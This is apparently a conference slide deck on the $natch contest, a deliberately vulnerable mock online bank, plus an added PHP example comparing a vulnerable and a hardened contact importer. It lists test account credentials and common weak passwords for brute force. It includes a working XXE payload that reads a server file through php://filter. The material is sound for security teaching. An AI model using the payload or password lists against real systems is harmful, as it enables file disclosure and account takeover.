Sergey Scherbel, Yuriy Dyachenko. Analyzing $natch
1. $natch
Sergey Scherbel & Yuriy Dyachenko, Positive Technologies, Positive Hack Days 2013

2. Some Background
The competition took place for the first time at PHDays 2012.
$natch aims at demonstrating the typical vulnerabilities of online banking systems.
Positive Technologies performs security tests of online banking systems on a regular basis. We are really into it.
The most interesting and dangerous vulnerabilities, along with the simply typical weaknesses, are integrated into PHDays iBank.

3. Last Year Results
― 9 participants;
― 4 winners;
― the biggest winnings of 3,500 roubles;
― some winners got into the Positive community (after an extremely scary interview, of course).

4. PHDays iBank 2
PHDays iBank 2 is NOT a real online banking system used by actual banks.
The system was developed exclusively for the PHDays 2013 competition.
PHDays iBank 2 employs the typical vulnerabilities of online banking systems.

5. Competition Rules
― 100 bank clients;
― 10 participants;
― 20,000 roubles of prize money;
― 1 day for source code analysis;
― 30–40 minutes of the actual competition;
― a participant will get as much money as he/she manages to transfer to his/her account;
― the participants can steal money from each other.

6. At Workshop
You will be able:
― to examine each vulnerability in detail;
― to exploit vulnerabilities "by hand";
― to exploit vulnerabilities with various tools.
Everything is performed on a special copy of the competition system.

7. Accounts
100001:PKAC1y
100002:RNrlO9
100003:Ndl1Ix
100004:hQPuJw
100005:kpgtCI

8. Authentication
One should enter the CAPTCHA to sign in.

9. Mobile Bank Authentication
No CAPTCHA here, thus account brute force is possible.

10. Accounts with Simple Passwords
100011:password
100012:phdays
100013:qwerty
100014:password
100015:123456
100016:12345
100017:11111
100018:ninja
100019:123123
100020:sex
100021:asdzxc
100022:654321
100023:iloveyou
100024:root
100025:master
100026:superman
...

11. Transaction Confirmation

12. Confirmation Bypass in Mobile Bank

13. Payment Templates Modification

14. Payment Templates Modification
The template is not checked to be owned by the current user.

15. Payment Templates Modification
$$

16. Payment Templates Modification
$$

17. Importing Contacts
Most online banks have a feature that allows one to import/export data.

18. XML External Entity
Loading of external entities is not disabled.
http://php.net/libxml_disable_entity_loader

19. XML External Entity
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE contact [
<!ENTITY x SYSTEM "php://filter/read=convert.base64-encode/resource=logs/changePassword.log">
]>
<contacts>
  <contact>
    <name>name</name>
    <account>90107430600712500003</account>
    <description>&x;</description>
  </contact>
</contacts>
http://www.php.net/manual/en/wrappers.php.php

20. XML External Entity
File contents in base64
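The contact import of slides 18 to 20 in working form, as an added example that is not PHDays iBank 2 code: the parser configured the way the slides describe beside a hardened one that rejects the DOCTYPE, never substitutes entities and, on PHP 7, turns the entity loader off. The file it reads is a constructed temp file standing in for logs/changePassword.log, and the function names are assumed.

```php
<?php
// Added example (not PHDays iBank 2 code): the contact import of slides
// 18-20 parsed the vulnerable way, beside a hardened version.
// Constructed stand-in for the file the slide payload reads
// (logs/changePassword.log there), so the script runs offline.
$target = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($target, "constructed secret\n");
// Same shape as the slide 19 document: a SYSTEM entity routed through
// php://filter so the file comes back base64-encoded (slide 20).
$xml = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE contact [<!ENTITY x SYSTEM'
     . ' "php://filter/read=convert.base64-encode/resource=' . $target . '">]>'
     . '<contacts><contact><name>name</name><account>90107430600712500003'
     . '</account><description>&x;</description></contact></contacts>';

function contactsFrom(DOMDocument $doc): array {
    $out = [];
    foreach ($doc->getElementsByTagName('contact') as $c) {
        $out[] = ['name'        => $c->getElementsByTagName('name')->item(0)->textContent,
                  'account'     => $c->getElementsByTagName('account')->item(0)->textContent,
                  'description' => $c->getElementsByTagName('description')->item(0)->textContent];
    }
    return $out;
}

// Vulnerable: LIBXML_NOENT makes libxml substitute entities, so the SYSTEM
// entity is fetched from disk and lands in <description> (also on PHP 8).
function importContactsVulnerable(string $xml): array {
    $doc = new DOMDocument();
    $doc->loadXML($xml, LIBXML_NOENT);
    return contactsFrom($doc);
}

// Hardened: the import format needs no DTD, so any DOCTYPE is rejected; no
// LIBXML_NOENT and no network; on PHP 7, where the external entity loader is
// on by default, it is switched off as the slide 18 link advises.
function importContactsHardened(string $xml): array {
    if (stripos($xml, '<!DOCTYPE') !== false) {
        throw new InvalidArgumentException('DOCTYPE not allowed in contact import');
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $doc = new DOMDocument();
    if (!$doc->loadXML($xml, LIBXML_NONET)) {
        throw new InvalidArgumentException('malformed contact import');
    }
    return contactsFrom($doc);
}

$leak = importContactsVulnerable($xml)[0]['description'];
echo 'vulnerable parser leaked: ' . base64_decode($leak);
try { importContactsHardened($xml); }
catch (InvalidArgumentException $e) { echo 'hardened parser refused: ', $e->getMessage(), "\n"; }
unlink($target);
```

The vulnerable function hands back the base64 of the file exactly as slide 20 shows, while the hardened one stops at the DOCTYPE check before libxml ever sees the entity.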
21. Debug Mode

22. Thanks for your attention!
Sergey Scherbel, sscherbel@ptsecurity.ru
Yuriy Dyachenko, ydyachenko@ptsecurity.ru